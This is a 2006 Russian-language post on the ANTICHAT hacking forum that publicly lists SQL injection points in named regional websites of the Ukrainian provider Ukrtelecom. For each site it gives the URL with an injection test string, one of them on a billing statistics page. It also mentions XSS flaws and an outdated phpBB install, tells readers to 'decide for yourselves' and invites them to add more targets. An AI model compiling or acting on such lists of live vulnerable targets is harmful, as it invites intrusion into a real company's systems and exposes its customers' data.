Sql Injections на сайтах Укртелекома

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

Sql Injections на сайтах Укртелекома

15.01.2006, 21:32

Nova

OpenVPN.CC

Регистрация: 15.07.2005

Сообщений: 1,599

Провел на форуме:
7670961

Репутация: 1034

Отправить сообщение для Nova с помощью ICQ

Sql Injections на сайтах Укртелекома

Долго думал про что выложить уязвимости и вот решил написать про филий Украйнского крупного провайдера Укртелеком

Вот SQL INJECTONS найденные мной

Запорожская филий http://billing.zp.ukrtel.net/users/stat.php?start_time='1'='1
Иньекция присутствует в модуле статистики !

Львовская филия http://www.lv.ukrtelecom.ua/ua/offers/forum/read.php?f=22&i='
Иньекция присутствует в самописном форуме.

Харьковская филия
http://www.kharkiv.ukrtelecom.ua/ua/news_world/printing.php?id='

Винницкая филия
http://vn.ukrtelecom.ua/scripts/bc.php?id='

Филий много писать про все не стал но уязвимости практически одни и теже присутствуют на всех сайтах Укртелекома.

Также на сайтах присутствуют XSS уязвимости

На днепропетровской Филий вообще стоит phpBB 2.0.15
Так что решайте сами...
Зарание извеняюсь если что не так как рание я нечего подобного не вылаживал !

У кого есть чем дополнить дополняйте...

Последний раз редактировалось Nova; 16.01.2006 в 23:32.. Причина: Добавил филий УУкртелекома